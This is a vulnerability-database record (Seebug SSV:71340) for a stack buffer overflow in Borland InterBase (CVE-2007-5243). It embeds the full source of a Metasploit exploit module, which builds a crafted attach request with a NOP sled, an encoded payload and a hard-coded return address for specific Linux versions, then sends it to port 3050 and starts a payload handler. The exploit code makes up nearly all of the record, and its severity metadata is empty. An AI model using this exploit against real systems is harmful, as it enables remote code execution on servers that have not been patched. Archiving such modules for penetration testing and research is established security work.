Description
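No description provided by source. The embedded Metasploit module text describes the issue as a stack buffer overflow in Borland InterBase, triggered by a specially crafted attach request, and cites CVE-2007-5243, OSVDB 38607 and BID 25917. The record's empty `cvelist` and CVSS score of 0.0 (vector `NONE`) therefore appear to reflect missing metadata rather than an assessed severity.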
{"lastseen": "2017-11-19T16:10:20", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "href": "https://www.seebug.org/vuldb/ssvid-71340", "references": [], "enchantments_done": [], "id": "SSV:71340", "title": "Borland InterBase PWD_db_aliased() Buffer Overflow", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 5, "sourceData": "\n ##\r\n# $Id: ib_pwd_db_aliased.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> 
MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => "\\x00\\x2f\\x3a\\x40\\x5c",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\tlength = 1152\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << "\\x00" * padding\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-71340", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645286450, "score": 1659785532}}
{}